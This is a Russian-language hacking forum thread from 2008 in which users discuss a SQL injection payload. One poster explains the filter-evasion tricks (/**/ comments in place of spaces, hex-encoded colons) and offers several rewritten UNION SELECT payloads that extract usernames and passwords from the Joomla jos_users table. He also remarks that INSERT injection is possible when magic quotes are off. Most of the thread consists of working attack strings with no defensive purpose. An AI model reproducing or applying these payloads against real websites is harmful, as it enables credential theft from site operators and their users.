day & night

SQL Injection, помогите разобраться
Дата обновления: , перейти к новому сообщению
icon13
#1
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2
Приветствую!

У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!
User is offline
Go topGo end

Ответов(1 - 9)
12.03.2008 - 8:18
#2
Soloton



Грамотный
Group Icon

Группа: Наши Люди
Сообщений: 292
Регистрация: 18.12.2005
Из: Невинномысск
Пользователь №: 88.260


Респектов: 72
-----X----
Цитата | Quote(Rain of Dark @ 12.03.2008 - 5:52)
0x3a
*

Это шестнадцатеричное представление символа : (двоеточие).
User is offline
Go topGo end
12.03.2008 - 8:53
#3
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
Цитата | Quote
есть сформированый до меня sql запрос

Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.huh.gif

Цитата | Quote
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел. smile.gif
User is offline
Go topGo end
12.03.2008 - 13:13
#4
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2
Цитата | Quote(delay(0) @ 12.03.2008 - 16:56)
Цитата | Quote
есть сформированый до меня sql запрос

Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.huh.gif

Цитата | Quote
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел. smile.gif
*


_http://www.xakep.ru/post/42707/default.asp
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
А почему тогда просто "+" не использовали?
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
а можно вместо select insert использовать?
User is offline
Go topGo end
12.03.2008 - 16:07
#5
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
*
Нет, /**/ - обход фильтрации пробелов, "+", он же %20, он же пробел, может фильтроваться в запросах.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
А почему тогда просто "+" не использовали?
*
См. выше.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
*
Почитай статьи по sql-иньекциям, их в интернете великое множество.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
а можно вместо select insert использовать?
*
Нет, после union insert использовать нельзя.
User is offline
Go topGo end
12.03.2008 - 16:35
#6
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2
Цитата | Quote(delay(0) @ 13.03.2008 - 0:10)
Нет, после union insert использовать нельзя
*


а вообще, кроме select?
User is offline
Go topGo end
12.03.2008 - 18:45
#7
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
Цитата | Quote(Rain of Dark @ 12.03.2008 - 16:38)
а вообще, кроме select?
*
Что? smile.gif
User is offline
Go topGo end
13.03.2008 - 6:38
#8
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2
Цитата | Quote(delay(0) @ 13.03.2008 - 2:48)
Что? smile.gif
*


ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д
User is offline
Go topGo end
13.03.2008 - 8:12
#9
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
Цитата | Quote(Rain of Dark @ 13.03.2008 - 6:41)
ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д
*
Тю, я ступил, insert юзать можно, но при magic quotes = off, тоесть, ' не должны экранироваться.
User is offline
Go topGo end
13.03.2008 - 13:14
#10
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2
экранироваться = фильтроваться? Оо
User is offline
Go topGo end
Вид темы: [ Линейный ] · Стандартный · Режимы сортировки: [ По возрастанию (0-9) ] · По убыванию (9-0)

 
Topic Options
Сейчас: 16.05.2024 - 0:58
 Мобильная версия | Lite версия
SoftoRooM © 2004-2024